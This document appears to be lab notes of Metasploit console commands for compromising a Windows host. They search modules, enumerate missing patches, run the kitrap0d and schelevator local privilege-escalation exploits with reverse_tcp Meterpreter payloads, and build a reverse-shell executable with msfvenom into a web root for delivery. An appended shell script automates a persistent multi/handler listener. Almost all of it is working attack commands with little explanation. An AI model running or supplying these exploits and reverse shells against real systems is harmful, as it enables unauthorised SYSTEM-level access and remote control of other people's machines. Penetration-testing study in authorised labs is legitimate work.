msfconsole commands we used include:

Search for modules that affect the Windows platform and have a type of post.

search type:post platform:windows

Search for modules that affect the Windows platform, have a type of exploit and can be run through a local session.

search type:exploit platform:windows path:local

List all the backgrounded sessions.

sessions -l

Restore (interact with) a backgrounded session by id.

sessions -i #

Use this module to enumerate missing patches, and so possible vulnerabilities, on the target host. This module needs an established session to run against, as can be seen by running ‘show options’. SESSION is the id of the established session.

use post/windows/gather/enum_patches
set SESSION 1
run

Use the ‘kitrap0d’ exploit to get SYSTEM level privileges on the Windows box. The payload is selected with ‘set PAYLOAD’ (not ‘use’), and with a reverse_tcp payload the listener address and port are given as LHOST and LPORT; a local exploit has no RHOST option.

info exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7479
exploit

Use the ‘schelevator’ exploit to run a scheduled task as SYSTEM and start a reverse TCP shell with those privileges. As above, the payload goes in PAYLOAD and the listener in LHOST/LPORT.

info exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms10_092_schelevator
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7478
exploit

Generate a reverse Meterpreter payload with msfvenom (Kali 2). This payload can be executed on a target host and will start a reverse TCP session back to the listener.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.168.110 lport=7477 -f exe -o /var/www/html/payload.exe

To allow the above session to connect you will need to start a listener on your Kali instance. The LHOST, LPORT and payload must match the values given to msfvenom.

use exploit/multi/handler
show options
set LHOST 192.168.168.110
set LPORT 7477
set payload windows/meterpreter/reverse_tcp
exploit

Steps to get a Meterpreter shell

  1. Deliver a payload.
    • Use an exploit to have msfconsole drop and execute the payload.
    • Manually create the payload, then find a way to get it onto the target and executed.
  2. Listen for the reverse TCP shell connection.
    • If you can use an exploit, this is taken care of for you.
    • If you manually drop the payload, use the exploit/multi/handler module to listen for the incoming connection.
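The handler setup above and step 2 of the procedure are the same six console commands every time, and a mismatch between the LHOST/LPORT given to msfvenom and the ones given to the handler is the usual reason a session never arrives. The following script is an added example, not part of the original notes or of Metasploit itself: it validates the address and port, writes them into an msfconsole resource script (an .rc file that msfconsole replays with -r), and launches the handler as a background job with ExitOnSession false so the listener keeps accepting further sessions. The function names and the output path are assumptions of this example.

```shell
#!/bin/sh
# Added example: package the exploit/multi/handler listener from the notes
# into a reusable msfconsole resource script. Assumes POSIX sh; msfconsole
# is only invoked if it is on the PATH.

# Return 0 if $1 is a dotted-quad IPv4 address, 1 otherwise.
valid_ipv4() {
  old_ifs=$IFS
  IFS=.
  set -- $1            # split on dots into positional parameters
  IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case $octet in ''|*[!0-9]*) return 1 ;; esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Return 0 if $1 is a TCP port in 1..65535, 1 otherwise.
valid_port() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then
    return 0
  fi
  return 1
}

# write_handler_rc LHOST LPORT PAYLOAD OUTFILE
# Writes the handler commands from the notes as a resource script.
# "exploit -j -z" runs the handler as a background job without interacting,
# and ExitOnSession false keeps it listening after the first session.
write_handler_rc() {
  lhost=$1; lport=$2; payload=$3; out=$4
  valid_ipv4 "$lhost" || { echo "invalid LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "invalid LPORT: $lport" >&2; return 1; }
  cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# start_handler RCFILE: replay the resource script in a quiet msfconsole.
start_handler() {
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$1"
  else
    echo "msfconsole not found; resource script left at $1" >&2
    return 2
  fi
}

main() {
  rc=${4:-handler.rc}   # assumed default output path
  write_handler_rc "$1" "$2" "$3" "$rc" || return 1
  start_handler "$rc"
}

# Only run when invoked with LHOST LPORT PAYLOAD [OUTFILE] on the command line.
if [ "$#" -ge 3 ]; then
  main "$@"
fi
```

Usage with the values from the msfvenom line above: sh handler.sh 192.168.168.110 7477 windows/meterpreter/reverse_tcp. The generated handler.rc can be checked with cat before it is replayed, which makes it easy to confirm the listener matches the payload before delivering it.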
